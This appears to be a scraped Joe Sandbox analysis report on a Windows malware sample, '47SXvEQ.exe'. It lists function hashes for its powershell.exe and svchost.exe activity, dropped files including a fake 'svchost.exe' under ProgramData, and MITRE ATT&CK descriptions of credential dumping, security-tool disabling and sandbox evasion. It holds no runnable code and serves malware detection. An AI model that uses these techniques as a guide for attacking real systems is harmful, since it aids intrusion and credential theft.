Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: ErrorLastioctlsocket
String ID: ..\s\crypto\bio\b_sock.c
API String ID: 1021210092-540685895
Opcode ID: 4b3498a1bc9275628b4fed3f0116b26741c55f820a8da06fdf06bba4b20f0e59
Instruction ID: 12ec0447edf3cee2f57c5b3a60b3995fd694d9f87a1516f3a3479ec1ef932f2f
Opcode Fuzzy Hash: 4b3498a1bc9275628b4fed3f0116b26741c55f820a8da06fdf06bba4b20f0e59
Instruction Fuzzy Hash: 2CE0D851F1950347F3105B61E834FB52258AF44309F004134E93DC26D9DF3DB1458F00

Analysis Process: powershell.exePID: 7092, Parent PID: 1068COMMON

Executed Functions

Function 00007FFD9B983DB1 Relevance: 1.4, Instructions: 1350COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1827084664.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9b980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 805a7f2f5b982234f70eed1907b56e22aacd99a6427b34fec1405c05d5283af5
Instruction ID: bc6deae47d06e00cf05b68ed14fc0b274122c2730360944b625d4b229bcd9279
Opcode Fuzzy Hash: 805a7f2f5b982234f70eed1907b56e22aacd99a6427b34fec1405c05d5283af5
Instruction Fuzzy Hash: 10821A22B1FBC91FE766976858256747FE1EF56210B0A01FFD08DCB2E3D9286D068352

Function 00007FFD9B8B62F3 Relevance: .8, Instructions: 830COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1826305067.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28f421530ecaecbc33d2ad5fc36ca6e9d7acd2863a8725b212077de2c5811254
Instruction ID: 51c0901015d6b24b92d6434e9d3263d0fea868d65d7eb62e3fc73b952ed70ea7
Opcode Fuzzy Hash: 28f421530ecaecbc33d2ad5fc36ca6e9d7acd2863a8725b212077de2c5811254
Instruction Fuzzy Hash: 19422A72B0D66E4FDB55EB6CE8A59E9BBA0FF54324B0502B7C04CC7197DA24A846C7C0

Function 00007FFD9B9867F5 Relevance: .4, Instructions: 440COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1827084664.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9b980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16838ec95609661d13c32e0911b48f369d4fd000fa9167b465c7cafd76a646bd
Instruction ID: ab3439e2a45b09542c19b658579bd280ebc4a97d28ba17493967c5eec13dc026
Opcode Fuzzy Hash: 16838ec95609661d13c32e0911b48f369d4fd000fa9167b465c7cafd76a646bd
Instruction Fuzzy Hash: F5D13A31A1FACE1FEBA5DB6898745B57BA1EF52350B0901FED05DCB0E3DA29A904C341

Function 00007FFD9B8B9870 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1826305067.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ead0ecc8a43f53f91cefcab6b20715afb3af999d4b19957bf5eaafd5754118c
Instruction ID: 11504d32fc0e949cae02a3ad6c4a3c1ebda483b1f6f2531e3514961e4562050c
Opcode Fuzzy Hash: 4ead0ecc8a43f53f91cefcab6b20715afb3af999d4b19957bf5eaafd5754118c
Instruction Fuzzy Hash: A941FB71A0DB8C4FDB589B5C9C4A6B97BE0FBA9310F04416FE449D3292CA70A915CBC2

Function 00007FFD9B79ED40 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1823252635.00007FFD9B79D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9b79d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11887c37bf0912e10cb575b066758908847d486629bdea18b7190fee89ff1558
Instruction ID: 77d072f54d0192d14e8547d019c3a0445f7ab5b63336935cd2c5dfccdaf5d8b1
Opcode Fuzzy Hash: 11887c37bf0912e10cb575b066758908847d486629bdea18b7190fee89ff1558
Instruction Fuzzy Hash: 0B41E67140EBC44FE756DB299C519523FF0EF57220B1A06DFD088CB1B7D629A84AC792

Function 00007FFD9B8BBD7A Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1826305067.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ace44e82b7ef487c752304a2622580866a209bf8f742d89659da4a66a1254a08
Instruction ID: a348ddc0585bdb89164de9963f59c374d24388b6d38444de48c4d3a5261b1415
Opcode Fuzzy Hash: ace44e82b7ef487c752304a2622580866a209bf8f742d89659da4a66a1254a08
Instruction Fuzzy Hash: D131E37150CA4C5FDB19DFACD84A7A9BBF0EF65324F04416BD058C7163DA20A41ACB82

Function 00007FFD9B98429F Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1827084664.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9b980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1318d36a8672dabfbfa9585ad9c01819ad27a6ecb2bb6d11a455b88677ccaf93
Instruction ID: d722385c376c47bd923c97c135b8d6991cd1f749060d57dcbb0de00606d4410c
Opcode Fuzzy Hash: 1318d36a8672dabfbfa9585ad9c01819ad27a6ecb2bb6d11a455b88677ccaf93
Instruction Fuzzy Hash: 2821D522B1ED4B2FE7B9DB5C546137467C1EF94311B5A01BED14ECB6E2DE24ED018241

Function 00007FFD9B98459C Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1827084664.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9b980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a627cbeb5ab7e682467c2aad181634b0aaf88495a7cd1bbfabdb2b82bf2a6546
Instruction ID: 629d6c5d4566ca8f368d5347d897134a36b210c7e2e08172664c5bb4eb898449
Opcode Fuzzy Hash: a627cbeb5ab7e682467c2aad181634b0aaf88495a7cd1bbfabdb2b82bf2a6546
Instruction Fuzzy Hash: 3011C232B2F94E5FE7B9DA5C94707B877C1EF44320B5A00BDD05DC76A6DD25AD018241

Function 00007FFD9B8B33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1826305067.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: 9bdfda7ff094c016ee29611a0f36b44afefaafe4c9d5040173e090ca4ad0f1af
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: 8701A73120CB0C4FD748EF0CE451AA6B3E0FB89320F10056EE58AC36A1DA32E882CB41

Function 00007FFD9B8BA1FB Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1826305067.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea7543db342339a8446d0908a6df1c636d44a69e795cc484fab2d145ed1611eb
Instruction ID: 9c7b144787e5607bdce7552d8bc797335210b92617a23fabecc4a0fb443b1684
Opcode Fuzzy Hash: ea7543db342339a8446d0908a6df1c636d44a69e795cc484fab2d145ed1611eb
Instruction Fuzzy Hash: 23F0F63660A68C5FCB52DF2CD8684D57FA0FF6520470A03BBE48CCB162DA229908CBC1

Non-executed Functions

Function 00007FFD9B8B84FA Relevance: 7.6, Strings: 6, Instructions: 99COMMON

Download Yara Rule

Strings

K_^, xrefs: 00007FFD9B8B857A
K_^, xrefs: 00007FFD9B8B85C9
K_^, xrefs: 00007FFD9B8B84FA
K_^, xrefs: 00007FFD9B8B856A
K_^, xrefs: 00007FFD9B8B852A
K_^, xrefs: 00007FFD9B8B850A

Memory Dump Source

Source File: 0000000F.00000002.1826305067.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID:
String ID: K_^$K_^$K_^$K_^$K_^$K_^
API String ID: 0-3805565700
Opcode ID: 07a130b8e50a9452fddb9f98e1bb5045bffc7351a94f98e5be6217a1f0ee3175
Instruction ID: 340d0eca0231b7bbfa2e4fcba960a7f9bf0f1bac7849aaac107e137054c8742e
Opcode Fuzzy Hash: 07a130b8e50a9452fddb9f98e1bb5045bffc7351a94f98e5be6217a1f0ee3175
Instruction Fuzzy Hash: 133175B3E0F5E64FE757476818764C62FA0EE2635835F01F6D0D89B1A3F804A9078791

Function 00007FFD9B8B86FA Relevance: 5.1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

Strings

K_^, xrefs: 00007FFD9B8B8762
K_^, xrefs: 00007FFD9B8B8772
K_^, xrefs: 00007FFD9B8B8712
K_^, xrefs: 00007FFD9B8B8722

Memory Dump Source

Source File: 0000000F.00000002.1826305067.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID:
String ID: K_^$K_^$K_^$K_^
API String ID: 0-4267328068
Opcode ID: 6392175037b7ab2e7c98ea3854f93493f2a6a04dd8c6ee7b002da9133cfa7346
Instruction ID: 67855f35240d0ef9b469fbdc09c921f53b7b0e275b4ec0720a23b588d6fbc611
Opcode Fuzzy Hash: 6392175037b7ab2e7c98ea3854f93493f2a6a04dd8c6ee7b002da9133cfa7346
Instruction Fuzzy Hash: 431163A3A0E6EA4BE766566918761D13FD0AF2625CB4B01F3D4A88F0B3F908290746C5

Analysis Process: svchost.exePID: 6024, Parent PID: 620COMMON

Executed Functions

Function 00007FF6C6B91140 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000050.00000002.1914489284.00007FF6C6B91000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF6C6B90000, based on PE: true

Associated: 00000050.00000002.1914426169.00007FF6C6B90000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000050.00000002.1914614843.00007FF6C6B9D000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000050.00000002.1914647700.00007FF6C6BA1000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000050.00000002.1915080882.00007FF6C6E20000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000050.00000002.1915448227.00007FF6C7096000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000050.00000002.1915494007.00007FF6C709A000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_80_2_7ff6c6b90000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42430f2344ef8e2c73b5046c9819b9514e03832da236caddbb8b9f06a9f0945f
Instruction ID: d7f16771795aac4fcc6d16fbe5a7a74512de2d8c8e6349a02c11793fc0e33dd8
Opcode Fuzzy Hash: 42430f2344ef8e2c73b5046c9819b9514e03832da236caddbb8b9f06a9f0945f
Instruction Fuzzy Hash: 5AB01230D0571984E3032F02D84135833B06B3B787F400030C54C43362CE7F50714B14

Analysis Process: powershell.exePID: 2944, Parent PID: 2536COMMON

Executed Functions

Function 00007FFD9BB717DE Relevance: .8, Instructions: 819COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000064.00000002.2027886935.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_100_2_7ffd9bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4291c6e68dce023342cbb1bb47b55b89ddf44d3484d760afedec88263a44b8f
Instruction ID: aab93fc78f965d6b7a6f024ae089ce6b5fa884923e933ab63e19104f03c3c395
Opcode Fuzzy Hash: a4291c6e68dce023342cbb1bb47b55b89ddf44d3484d760afedec88263a44b8f
Instruction Fuzzy Hash: 3B323722B0EACD0FE7669B6848B55B47BE1EF56214B0901FBD08DCB5E3D918AD06C351

Function 00007FFD9BAA4DC5 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000064.00000002.2027015207.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_100_2_7ffd9baa0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4da5cee81f7e0d34698eb2e94d276000709b4becc08576b14f242b0afe5b47f9
Instruction ID: eaa61ef321640fa2cb7030be5740960095bd2829e4bb9ddfeb6a9d5ba9d5110a
Opcode Fuzzy Hash: 4da5cee81f7e0d34698eb2e94d276000709b4becc08576b14f242b0afe5b47f9
Instruction Fuzzy Hash: 1671B231E0964D4FDB55DB68D8616EC7BF1EF5A314F1441BEE049D72A2CE35A802CB50

Function 00007FFD9BB70AA4 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000064.00000002.2027886935.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_100_2_7ffd9bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19f3311f708de58053f31d8b9c144f47cbb342982eb7dc3a571c525bbf9df74e
Instruction ID: 8ecac880ed625e79e3fe9f301733e65cb8a1062deaeb7b6dc8f57d1a0c6f177c
Opcode Fuzzy Hash: 19f3311f708de58053f31d8b9c144f47cbb342982eb7dc3a571c525bbf9df74e
Instruction Fuzzy Hash: 6021E433B0EA5D0FEBB1969C68655B873D1EF54B68F5901BBD04DC35E2DD08AD058381

Function 00007FFD9BAA3945 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000064.00000002.2027015207.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_100_2_7ffd9baa0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: bdda0109228a190c12742b9e7315728e2f6bb354b6803920c3f62299af715007
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 9D01677121CB0C4FD748EF0CE451AA5B7E0FF95364F10056DE58AC76A5D636E881CB45

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 47SXvEQ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Sigma Signatures

Change of critical system settings

System Summary

Data Obfuscation

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Change of critical system settings

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\svchost.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\ ?? ? \Display (1).png

C:\Users\user\AppData\Local\Temp\Built.exe

Windows Analysis Report
47SXvEQ.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

